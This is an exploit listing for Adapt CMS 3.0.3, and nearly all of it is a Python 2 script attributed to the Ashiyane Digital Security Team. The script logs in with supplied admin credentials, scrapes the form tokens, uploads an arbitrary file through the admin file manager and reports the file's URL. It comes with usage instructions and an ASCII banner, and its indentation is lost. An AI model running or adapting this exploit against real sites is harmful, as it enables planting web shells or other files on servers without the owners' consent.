Adapt CMS 3.0.3 File Upload

Adapt CMS version 3.0.3 suffers from a remote file upload vulnerability.


MD5 | e2e1068a2f24118cf38553e5bd14d304


#!usr/bin/python
"""
| Exploit Title: Adapt Cms Arbitrary File Upload
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.adaptcms.com/
|
| Download Link : http://www.adaptcms.com/downloads/latest_adaptcms.zip
|
| Tested Version : AdaptCMS 3.0.3
|
| Tested on: Windows 7 / Mozilla Firefox
|
| Date: 2017-01-22
"""
import requests,os,sys
from bs4 import BeautifulSoup
error=""
def banner_print(error):
banner="""
_______________________________________________________________________________________
_ _ _____ _ _ _ _
/\ | | (_) | __ \(_) (_) | | |
/ \ ___| |__ _ _ _ __ _ _ __ ___ | | | |_ __ _ _| |_ __ _| |
/ /\ \ / __| '_ \| | | | |/ _` | '_ \ / _ \ | | | | |/ _` | | __/ _` | |
/ ____ \\__ \ | | | | |_| | (_| | | | | __/ | |__| | | (_| | | || (_| | |
/_/ \_\___/_| |_|_|\__, |\__,_|_| |_|\___| |_____/|_|\__, |_|\__\__,_|_|
__/ | __/ |
|___/ |___/
_____ _ _ _______
/ ____| (_) | |__ __|
| (___ ___ ___ _ _ _ __ _| |_ _ _ | | ___ __ _ _ __ ___
\___ \ / _ \/ __| | | | '__| | __| | | | | |/ _ \/ _` | '_ ` _ \
____) | __/ (__| |_| | | | | |_| |_| | | | __/ (_| | | | | | |
|_____/ \___|\___|\__,_|_| |_|\__|\__, | |_|\___|\__,_|_| |_| |_|
__/ |
|___/

\ / _._|_ _ _| |_ /\ _ _ . _ _ |_ _|_
\/\/ | | | (/_(_| |_)\/ /~~\| | ||| .(_|| | |
/ _| |
____________________________________________________________________________________

\t%s
\t Usage : python exploit.py site username_of_admin password_of_admin
\t example : python exploit.py http://example.com admin 12345
"""%(error)
print banner
banner_print(error)
http=requests.session()
class adapt_exploit:
def __init__(self,url,user,passwd,file):
self.url=url
self.user=user
self.passwd=passwd
self.file=file
def login(self):
req=http.get(url+'/login')
soup=BeautifulSoup(req.content,"html.parser")
token1=soup.find_all('input',{'type':'hidden','name':'data[_Token][key]'})[0].get('value')
token2=soup.find_all('input',{'type':'hidden','name':'data[_Token][fields]'})[1].get('value')
print '\n[+] The token for login was received successfully.\n'
data={'_method':'POST',
'data[_Token][key]':token1,
'data[User][username]':self.user,
'data[User][password]':self.passwd,
'data[_Token][fields]':token2}
req=http.post(url+'/login',data=data)
if 'success' in req.content.lower():
print '[+] Login success\n'
else:
print '[!] Login Failed\n'
exit()
def upload(self):
req=http.get(url+'/admin/files/add')
soup=BeautifulSoup(req.content,"html.parser")
token1=soup.find('input',{'type':'hidden','name':'data[_Token][key]'}).get('value')
token2=soup.find('input',{'type':'hidden','name':'data[_Token][fields]'}).get('value')
print '[+] The token for login was received successfully.\n'
path=raw_input('Please enter path file that you want upload ...\n')
path=path.replace('"','')
path=path.replace('\'','')
f=open(path,'rb')
file= {'data[File][filename]' : f}
data={'_method':'POST',
'data[_Token][key]':token1,
'data[_Token][fields]':token2,
'data[File][type]':'upload',
'data[File][0][random_filename]':'0'
}
req=http.post(url+'/admin/files/add',data=data,files=file)
check=http.get('%s/uploads/'%(url))
file_name=os.path.basename(f.name).replace(' ','_')
if file_name in check.content:
print "[+] File upload was successful\n"
print "URL Of File : %s/upload/%s"%(url,file_name)
else:
print "\n[-] Failed to upload file "
try :
url=sys.argv[1]
user=sys.argv[2]
passwd=sys.argv[3]
expl=adapt_exploit(url,user,passwd,file)
expl.login()
expl.upload()
except IndexError as e:
if 'nt' in os.name :
os.system('cls')
else:
os.system('clear')
error="Invalid Usage !"
banner_print(error)
except Exception as e:
print "oops !!!\n Some Thing is Wrong :(( "
print str(e)

Related Posts